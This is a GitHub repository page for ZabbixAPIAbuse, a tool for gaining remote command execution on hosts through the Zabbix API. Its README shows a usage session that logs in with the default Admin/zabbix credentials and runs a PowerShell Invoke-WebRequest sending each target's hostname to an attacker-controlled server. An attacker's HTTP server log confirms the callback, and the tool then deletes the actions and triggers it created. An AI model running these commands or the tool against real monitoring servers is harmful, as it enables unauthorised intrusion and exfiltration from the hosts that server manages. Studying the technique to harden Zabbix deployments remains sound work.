Skip to content
/ ZabbixAPIAbuse Public

Abuse Zabbix API to obtain Remote Command Execution on hosts

17 stars 5 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Diefunction/ZabbixAPIAbuse

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
README.md
README.md
 
 
ZabbixAPIAbuse.py
ZabbixAPIAbuse.py
 
 

Repository files navigation

ZabbixAPIAbuse

ZabbixAPIAbuse is an abusing tool for Zabbix API to execute commands on zabbix agents.

Requirements

python3 -m pip install requests

Example

python3 ZabbixAPIAbuse.py
URL: http://localhost/zabbix/api_jsonrpc.php
CMD: powershell -c "Invoke-WebRequest -Uri http://192.168.1.100/$(hostname)"
Method [Default: action] (action / item): action
Username [Default: Admin]: Admin
Password [Default: zabbix]: zabbix
[0]: DESKTOP-XXXXXXX
[1]: DESKTOP-XXXXXXY
Host num: 0
[*] Waiting for execution ...
[*] Actions deleted
[*] Triggers deleted

sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)
192.168.1.108 - - [11/May/2020 13:36:23] "GET /DESKTOP-XXXXXXX HTTP/1.1" 404 -

About

Abuse Zabbix API to obtain Remote Command Execution on hosts

Resources

Readme
Activity

Stars

17 stars

Watchers

2 watching

Forks

5 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages